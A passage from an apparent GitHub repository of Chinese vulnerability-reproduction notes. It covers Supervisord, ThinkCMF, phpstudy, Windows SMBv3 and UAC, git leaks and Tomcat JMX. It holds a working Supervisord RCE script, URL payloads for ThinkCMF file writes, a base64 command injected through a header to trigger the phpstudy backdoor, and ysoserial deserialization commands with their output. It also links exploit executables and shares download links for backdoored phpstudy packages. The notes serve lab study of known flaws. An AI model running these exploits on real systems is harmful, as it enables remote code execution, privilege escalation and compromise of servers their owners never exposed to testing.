踩坑记录 68 | 无 69 | 70 | # 0x07 参考链接 71 | 无 72 | -------------------------------------------------------------------------------- /2020_11_11_Supervisord远程代码执行漏洞复现(CVE-2017-11610)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Supervisord远程代码执行漏洞复现(CVE-2017-11610)/0.png -------------------------------------------------------------------------------- /2020_11_11_Supervisord远程代码执行漏洞复现(CVE-2017-11610)/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import xmlrpc.client 3 | import sys 4 | 5 | 6 | target = sys.argv[1] 7 | command = sys.argv[2] 8 | with xmlrpc.client.ServerProxy(target) as proxy: 9 | old = getattr(proxy, 'supervisor.readLog')(0,0) 10 | 11 | logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')() 12 | getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile)) 13 | result = getattr(proxy, 'supervisor.readLog')(0,0) 14 | 15 | print(result[len(old):]) 16 | -------------------------------------------------------------------------------- /2020_11_11_Supervisord远程代码执行漏洞复现(CVE-2017-11610)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Supervisord:一款python实现的进程管理程序 3 | 4 | # 0x01 复现环境 5 | 使用环境:vulhub中的环境 6 | 复现版本:无 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:kali_x64_en-us 10 | 11 | cd vulhub/supervisor/CVE-2017-11610 12 | docker-compose up -d 13 | 14 | # 0x03 利用条件 15 | 无 16 | 17 | # 0x04 影响版本 18 | Supervisor 3.3.2 (2017-06-03) 19 | Supervisor 3.3.1 (2016-08-02) 20 | Supervisor 3.3.0 (2016-05-14) 21 | Supervisor 3.2.3 (2016-03-19) 22 | Supervisor 3.2.2 (2016-03-04) 23 | Supervisor 3.2.1 (2016-02-06) 24 | Supervisor 3.2.0 (2015-11-30) 25 | Supervisor 3.1.3 (2014-10-28) 26 | Supervisor 3.1.2 (2014-09-07) 27 | 28 | # 0x05 漏洞复现 29 | 攻击环境:kali_x64_en-us 30 | 31 | python3 ./poc.py "http://172.17.0.1:9001/RPC2" "id" 32 | 如下图 33 | ![image](./0.png) 34 | 35 | # 0x06 踩坑记录 36 | 无 37 | 38 | # 0x07 参考链接 39 | 无 40 | -------------------------------------------------------------------------------- /2020_11_11_ThinkCMF远程代码执行漏洞复现/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_ThinkCMF远程代码执行漏洞复现/0.png -------------------------------------------------------------------------------- /2020_11_11_ThinkCMF远程代码执行漏洞复现/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_ThinkCMF远程代码执行漏洞复现/1.png -------------------------------------------------------------------------------- /2020_11_11_ThinkCMF远程代码执行漏洞复现/ThinkCMFX_2.2.3.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_ThinkCMF远程代码执行漏洞复现/ThinkCMFX_2.2.3.zip -------------------------------------------------------------------------------- /2020_11_11_ThinkCMF远程代码执行漏洞复现/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | 基于ThinkPHP 3.2.3,让开发者更方便的一款开发框架 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:ThinkCMF X2.2.3 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:win10_1909_pro_x64_zh-chs 10 | 11 | 下载ThinkCMF X2.2.3,直接放到phpstudy的目录下,访问/ThinkCMFX/,根据提示操作即可 12 | 13 | # 0x03 利用条件 14 | 无 15 | 16 | # 0x04 影响版本 17 | ThinkCMF X1.6.0 18 | ThinkCMF X2.1.0 19 | ThinkCMF X2.2.0 20 | ThinkCMF X2.2.1 21 | ThinkCMF X2.2.2 22 | ThinkCMF X2.2.3 23 | 24 | # 0x05 漏洞复现 25 | 攻击环境:win10_1909_pro_x64_zh-chs(在英文的kali系统下访问会提示“just a demo for multi lang user! LANG IS en-us;”) 26 | 27 | 任意文件写入漏洞复现: 28 | 浏览器下访问 29 | ``` 30 | ?a=fetch&templateFile=public/index&prefix=''&content=file_put_contents('test.php','') 31 | ``` 32 | 访问test.php,可以看到phpinfo已经加载出来 33 | ![image](./0.png) 34 | 35 | 任意文件包含漏洞复现: 36 | 浏览器访问 37 | ``` 38 | ?a=display&templateFile=README.md 39 | ``` 40 | 可以看到成功包含了README.md 41 | ![image](./1.png) 42 | 43 | # 0x06 踩坑记录 44 | 坑1: 45 | 搭建环境时,第三步报错,提示“thinkcmf 安装报错 Driver.class.php  LINE: 350”,执行“drop database thinkcmf”后,重新安装成功,原因未知 46 | 47 | # 0x07 参考链接 48 | 无 49 | -------------------------------------------------------------------------------- /2020_11_11_Windows SMBv3本地权限提升漏洞复现(CVE-2020-0796)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows SMBv3本地权限提升漏洞复现(CVE-2020-0796)/0.png -------------------------------------------------------------------------------- /2020_11_11_Windows SMBv3本地权限提升漏洞复现(CVE-2020-0796)/cve-2020-0796-local提权工具.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows SMBv3本地权限提升漏洞复现(CVE-2020-0796)/cve-2020-0796-local提权工具.exe -------------------------------------------------------------------------------- /2020_11_11_Windows SMBv3本地权限提升漏洞复现(CVE-2020-0796)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | SMB:Windows下常用的文件共享的协议 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:无 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:windows 10 10 | 11 | # 0x03 利用条件 12 | 无 13 | 14 | # 0x04 影响版本 15 | Windows  10 Version 1903 for 32-bit Systems 16 | Windows  10 Version 1903 for ARM64-based Systems 17 | Windows  10 Version 1903 for x64-based Systems 18 | Windows  10 Version 1909 for 32-bit Systems 19 | Windows  10 Version 1909 for ARM64-based Systems 20 | Windows  10 Version 1909 for x64-based Systems 21 | Windows  Server, version 1903 (Server Core installation) 22 | Windows  Server, version 1909 (Server Core installation) 23 | 24 | # 0x05 漏洞复现 25 | 攻击环境:windows 10 26 | 27 | 执行“cve-2020-0796-local提权工具.exe”后,会以管理员权限弹出命令提示符窗口,如下图 28 | ![image](./0.png) 29 | 30 | # 0x06 踩坑记录 31 | 坑1: 32 | 复现失败原因:可能禁用了SMB 3.1的压缩功能 33 | 解决办法(启用SMB 3.1的压缩功能): 34 | 以管理员方式运行 Powershell,执行如下命令: 35 | ``` 36 | Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 0 -Force 37 | ``` 38 | -Value的值改为1禁用 39 | 40 | # 0x07 参考链接 41 | 无 42 | -------------------------------------------------------------------------------- /2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/0.png -------------------------------------------------------------------------------- /2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/1.png -------------------------------------------------------------------------------- /2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/2.png -------------------------------------------------------------------------------- /2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/3.png -------------------------------------------------------------------------------- /2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/4.png -------------------------------------------------------------------------------- /2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/5.png -------------------------------------------------------------------------------- /2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/6.png -------------------------------------------------------------------------------- /2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/hhupd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/hhupd.exe -------------------------------------------------------------------------------- /2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | UAC:Windows下一款权限控制程序 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:Windows 7 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:Windows 7 专业版 版本 6.1(内部版本 7601:Service Pack 1) 10 | 11 | # 0x03 利用条件 12 | 无 13 | 14 | # 0x04 影响版本 15 | 服务器版本: 16 | Windows 2008r2 7601 17 | Windows 2012r2 9600 18 | Windows 2016 14393 19 | Windows 2019 17763 20 | PC版本: 21 | Windows 7 SP1 7601 22 | Windows 8 9200 23 | Windows 8.1 9600 24 | Windows 10 1511 10240 25 | Windows 10 1607 14393 26 | Windows 10 1703 15063 27 | Windows 10 1709 16299 28 | 29 | # 0x05 漏洞复现 30 | 攻击环境:Windows 7 专业版 版本 6.1(内部版本 7601:Service Pack 1) 31 | 32 | 创建用户wql(普通用户权限),使用账号wql登入系统,win+r输入cmd,键入命令whoami,结果如下 33 | ![image](./0.png) 34 | 使用管理员权限打开工具hhupd.exe,点击显示详细信息,按图示点击 35 | ![image](./2.png) 36 | ![image](./3.png) 37 | 关闭窗口,这时候浏览器会打开之前点击的链接,(必须要关闭窗口,不然不会显示的),在浏览器中点击页面,另存为,如下 38 | ![image](./4.png) 39 | 选择C:\Windows\System32\cmd ,如下 40 | ![image](./5.png) 41 | 回车之后就会弹出一个命令提示符窗口,输入命令:whoami,成功提权,结果如下 42 | ![image](./6.png) 43 | 44 | # 0x06 踩坑记录 45 | 坑1: 46 | 有的复现帖子上说win10 1903和win7都可以,但是实测win 10 1903 (OS 内部版本18362.778)与win7 (7600)均复现失败。 47 | 48 | # 0x07 参考链接 49 | 无 50 | -------------------------------------------------------------------------------- /2020_11_11_phpstudy后门漏洞复现/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_phpstudy后门漏洞复现/0.png -------------------------------------------------------------------------------- /2020_11_11_phpstudy后门漏洞复现/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_phpstudy后门漏洞复现/1.png -------------------------------------------------------------------------------- /2020_11_11_phpstudy后门漏洞复现/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | phpstudy:流行的php集成部署环境 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:phpstudy 2018 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:2008_r2_standard_zh-chs 10 | 11 | 后门代码存在于phpstudy 2016和phpstudy 2018自带的php-5.2.17、php-5.4.45中的\ext\php_xmlrpc.dll模块中,用记事本打开此文件,查找“@eval”,若文件存在“@eval(%s('%s'));”则存在后门,如下图 12 | ![image](./0.png) 13 | 下载并安装phpstudy 2018,按照提示下一步即可 14 | 15 | # 0x03 利用条件 16 | 无 17 | 18 | # 0x04 影响版本 19 | phpstudy 2016和phpstudy 2018自带的php-5.2.17、php-5.4.45 20 | 21 | # 0x05 漏洞复现 22 | 攻击环境:kali_x64_en-us 23 | 24 | burp抓包,请求头中添加字段:Accept-Charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7 25 | 上述字符串是“echo system("net user");”base64编码后的字符串,结果如下图 26 | ![image](./1.png) 27 | 需要注意,发送的数据包头部中:Accept-Enconding:gzio, deflate有一处问题,deflate与前面的逗号之间有一个空格,需要手动删除,不然无法成功执行命令 28 | 29 | # 0x06 踩坑记录 30 | 无 31 | 32 | # 0x07 参考链接 33 | 无 34 | 35 | # 注意 36 | 我当时寻找有漏洞的版本花了好多时间,现将我寻找到有效版本分享给大家,漏洞环境大于25MB,不能上传到github中,使用百度云分享 37 | phpstudy2016分享,提取码:ybdt,链接:https://pan.baidu.com/s/1-dX55n6xT5hNcBYkxicOBg 38 | phpstudy2018分享,提取码:ybdt,链接:https://pan.baidu.com/s/1bLX53txLZx4NQAwTsM4BQA 39 | -------------------------------------------------------------------------------- /2020_11_11_“git泄漏”漏洞复现/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_“git泄漏”漏洞复现/0.png -------------------------------------------------------------------------------- /2020_11_11_“git泄漏”漏洞复现/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_“git泄漏”漏洞复现/1.png -------------------------------------------------------------------------------- /2020_11_11_“git泄漏”漏洞复现/GitHack-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_“git泄漏”漏洞复现/GitHack-master.zip -------------------------------------------------------------------------------- /2020_11_11_“git泄漏”漏洞复现/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | git:分布式版本控制系统 3 | 4 | # 0x01 复现环境 5 | 使用环境:攻防世界中的环境 6 | 复现版本:无 7 | 8 | # 0x02 环境搭建 9 | 无 10 | 11 | # 0x03 利用条件 12 | 无 13 | 14 | # 0x04 影响版本 15 | 无 16 | 17 | # 0x05 漏洞复现 18 | 攻击环境:kali_x64_en-us 19 | 20 | git clone https://github.com/lijiejie/GitHack 21 | cd ./GitHack-master 22 | python ./GitHack.py http://124.126.19.106:31232/.git/ 23 | 如下图 24 | ![image](./0.png) 25 | ![image](./1.png) 26 | 27 | # 0x06 踩坑记录 28 | 无 29 | 30 | # 0x07 参考链接 31 | 无 32 | -------------------------------------------------------------------------------- /2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a0.png -------------------------------------------------------------------------------- /2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a1.png -------------------------------------------------------------------------------- /2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a2.png -------------------------------------------------------------------------------- /2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a3.png -------------------------------------------------------------------------------- /2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/a4.png -------------------------------------------------------------------------------- /2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Tomcat:一款流行的java web应用服务器 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:Apache Tomcat 8.0.36 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:win7_ult_x64_zh-chs 10 | 11 | 下载并解压apache-tomcat-8.0.36.zip 12 | 下载并安装jdk-7u79-windows-x64.exe 13 | 配置环境变量JAVA_HOME(这里有一点需要注意:配置环境变量JAVA_HOME前也可在cmd.exe下执行“java.exe -version”,原因是jdk安装完毕后会自动将java.exe及相关文件拷贝到c:\windows\system32\下) 14 | 在conf/server.xml中添加以下语句 15 | ``` 16 | 17 | ``` 18 | ![image](./a0.png) 19 | 然后下载catalina-jmx-remote.jar包和groovy-2.3.9.jar包,放到tomcat的lib目录下 20 | 注意: 21 | 1、下载的catalina-jmx-remote.jar要与对应tomcat版本一致,一般这个jar在官方tomcat下载目录的extras文件夹里 22 | 2、下载groovy,版本最好为2.3.9,官网已经不提供下载了,附上下载地址:https://mvnrepository.com/artifact/org.codehaus.groovy/groovy/2.3.9 23 | 接着修改bin/catalina.bat,在Execute The Requested Command上面添加 24 | ``` 25 | set CATALINA_OPTS=-Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false 26 | ``` 27 | -Dcom.sun.management.jmxremote.ssl=false 指定是否使用SSL通讯 28 | -Dcom.sun.management.jmxremote.authenticate=false 指定是否需要密码验证 29 | ![image](./a1.png) 30 | 最后运行bin/startup.bat启动tomcat! 31 | ![image](./a2.png) 32 | 查看目标是否启动了JmxRemoteLifecycleListener,即是否监听端口10001,10002,经查看,已启动 33 | ![image](./a3.png) 34 | 35 | # 0x03 利用条件 36 | 目标是否启动了JmxRemoteLifecycleListener,即是否监听端口10001,10002 37 | 38 | # 0x04 影响版本 39 | Apache Tomcat 9.0.0.M1 to 9.0.0.M11 40 | Apache Tomcat 8.5.0 to 8.5.6 41 | Apache Tomcat 8.0.0.RC1 to 8.0.38 42 | Apache Tomcat 7.0.0 to 7.0.72 43 | Apache Tomcat 6.0.0 to 6.0.47 44 | 45 | # 0x05 漏洞复现 46 | 攻击环境:Kali-Linux-2020.2-vmware-amd64 47 | 48 | 下载ysoserial,执行 49 | ``` 50 | java -cp ./ysoserial-master-6eca5bc740-1.jar ysoserial.exploit.RMIRegistryExploit 192.168.149.134 10001 Groovy1 calc.exe 51 | ``` 52 | 可以看到靶机上弹出了计算器 53 | ![image](./a4.png) 54 | 55 | # 0x06 踩坑记录 56 | 坑1: 57 | tomcat相同版本,在java 1.8.0_131下无法弹出计算机。觉得这个漏洞应该还和java版本有关。和groovy版本也有关 58 | 坑2: 59 | 利用成功,ysoserial输出如下 60 | ``` 61 | Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true 62 | WARNING: An illegal reflective access operation has occurred 63 | WARNING: Illegal reflective access by org.codehaus.groovy.reflection.CachedClass$3$1 (file:/root/Desktop/ysoserial-master-6eca5bc740-1.jar) to method java.lang.Object.finalize() 64 | WARNING: Please consider reporting this to the maintainers of org.codehaus.groovy.reflection.CachedClass$3$1 65 | WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations 66 | WARNING: All illegal access operations will be denied in a future release 67 | java.lang.ClassCastException: java.lang.ProcessImpl cannot be cast to java.util.Set 68 | at com.sun.proxy.$Proxy9.entrySet(Unknown Source) 69 | at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:443) 70 | at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) 71 | at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57) 72 | at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) 73 | at java.lang.reflect.Method.invoke(Method.java:606) 74 | at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017) 75 | at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1893) 76 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) 77 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 78 | at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370) 79 | at java.util.HashMap.readObject(HashMap.java:1180) 80 | at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) 81 | at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57) 82 | at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) 83 | at java.lang.reflect.Method.invoke(Method.java:606) 84 | at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017) 85 | at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1893) 86 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) 87 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 88 | at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1990) 89 | at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:500) 90 | at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:427) 91 | at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) 92 | at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57) 93 | at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) 94 | at java.lang.reflect.Method.invoke(Method.java:606) 95 | at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017) 96 | at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1893) 97 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) 98 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 99 | at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1990) 100 | at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1915) 101 | at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798) 102 | at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350) 103 | at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370) 104 | at sun.rmi.registry.RegistryImpl_Skel.dispatch(Unknown Source) 105 | at sun.rmi.server.UnicastServerRef.oldDispatch(UnicastServerRef.java:409) 106 | at sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:267) 107 | at sun.rmi.transport.Transport$2.run(Transport.java:202) 108 | at sun.rmi.transport.Transport$2.run(Transport.java:199) 109 | at java.security.AccessController.doPrivileged(Native Method) 110 | at sun.rmi.transport.Transport.serviceCall(Transport.java:198) 111 | at sun.rmi.transport.tcp.TCPTransport.handleMessages(TCPTransport.java:567) 112 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run0(TCPTransport.java:828) 113 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.access$400(TCPTransport.java:619) 114 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler$1.run(TCPTransport.java:684) 115 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler$1.run(TCPTransport.java:681) 116 | at java.security.AccessController.doPrivileged(Native Method) 117 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(TCPTransport.java:681) 118 | at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) 119 | at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) 120 | at java.lang.Thread.run(Thread.java:745) 121 | at java.rmi/sun.rmi.transport.StreamRemoteCall.exceptionReceivedFromServer(StreamRemoteCall.java:303) 122 | at java.rmi/sun.rmi.transport.StreamRemoteCall.executeCall(StreamRemoteCall.java:279) 123 | at java.rmi/sun.rmi.server.UnicastRef.invoke(UnicastRef.java:380) 124 | at java.rmi/sun.rmi.registry.RegistryImpl_Stub.bind(RegistryImpl_Stub.java:73) 125 | at ysoserial.exploit.RMIRegistryExploit$1.call(RMIRegistryExploit.java:77) 126 | at ysoserial.exploit.RMIRegistryExploit$1.call(RMIRegistryExploit.java:71) 127 | at ysoserial.secmgr.ExecCheckingSecurityManager.callWrapped(ExecCheckingSecurityManager.java:72) 128 | at ysoserial.exploit.RMIRegistryExploit.exploit(RMIRegistryExploit.java:71) 129 | at ysoserial.exploit.RMIRegistryExploit.main(RMIRegistryExploit.java:65) 130 | ``` 131 | 利用失败,ysoserial输出如下 132 | ``` 133 | $ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 192.168.228.152 10001 Groovy1 calc.exe 134 | java.rmi.ServerException: RemoteException occurred in server thread; nested exception is: 135 | java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is: 136 | java.lang.ClassNotFoundException: org.codehaus.groovy.runtime.ConvertedClosure (no security manager: RMI class loader disabled) 137 | at sun.rmi.server.UnicastServerRef.oldDispatch(UnicastServerRef.java:419) 138 | at sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:267) 139 | at sun.rmi.transport.Transport$2.run(Transport.java:202) 140 | at sun.rmi.transport.Transport$2.run(Transport.java:199) 141 | at java.security.AccessController.doPrivileged(Native Method) 142 | at sun.rmi.transport.Transport.serviceCall(Transport.java:198) 143 | at sun.rmi.transport.tcp.TCPTransport.handleMessages(TCPTransport.java:567) 144 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run0(TCPTransport.java:828) 145 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.access$400(TCPTransport.java:619) 146 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler$1.run(TCPTransport.java:684) 147 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler$1.run(TCPTransport.java:681) 148 | at java.security.AccessController.doPrivileged(Native Method) 149 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(TCPTransport.java:681) 150 | at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) 151 | at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) 152 | at java.lang.Thread.run(Thread.java:745) 153 | at sun.rmi.transport.StreamRemoteCall.exceptionReceivedFromServer(Unknown Source) 154 | at sun.rmi.transport.StreamRemoteCall.executeCall(Unknown Source) 155 | at sun.rmi.server.UnicastRef.invoke(Unknown Source) 156 | at sun.rmi.registry.RegistryImpl_Stub.bind(Unknown Source) 157 | at ysoserial.exploit.RMIRegistryExploit$1.call(RMIRegistryExploit.java:44) 158 | at ysoserial.exploit.RMIRegistryExploit$1.call(RMIRegistryExploit.java:38) 159 | at ysoserial.secmgr.ExecCheckingSecurityManager.wrap(ExecCheckingSecurityManager.java:72) 160 | at ysoserial.exploit.RMIRegistryExploit.exploit(RMIRegistryExploit.java:38) 161 | at ysoserial.exploit.RMIRegistryExploit.main(RMIRegistryExploit.java:32) 162 | Caused by: java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is: 163 | java.lang.ClassNotFoundException: org.codehaus.groovy.runtime.ConvertedClosure (no security manager: RMI class loader disabled) 164 | at sun.rmi.registry.RegistryImpl_Skel.dispatch(Unknown Source) 165 | at sun.rmi.server.UnicastServerRef.oldDispatch(UnicastServerRef.java:409) 166 | at sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:267) 167 | at sun.rmi.transport.Transport$2.run(Transport.java:202) 168 | at sun.rmi.transport.Transport$2.run(Transport.java:199) 169 | at java.security.AccessController.doPrivileged(Native Method) 170 | at sun.rmi.transport.Transport.serviceCall(Transport.java:198) 171 | at sun.rmi.transport.tcp.TCPTransport.handleMessages(TCPTransport.java:567) 172 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run0(TCPTransport.java:828) 173 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.access$400(TCPTransport.java:619) 174 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler$1.run(TCPTransport.java:684) 175 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler$1.run(TCPTransport.java:681) 176 | at java.security.AccessController.doPrivileged(Native Method) 177 | at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(TCPTransport.java:681) 178 | at 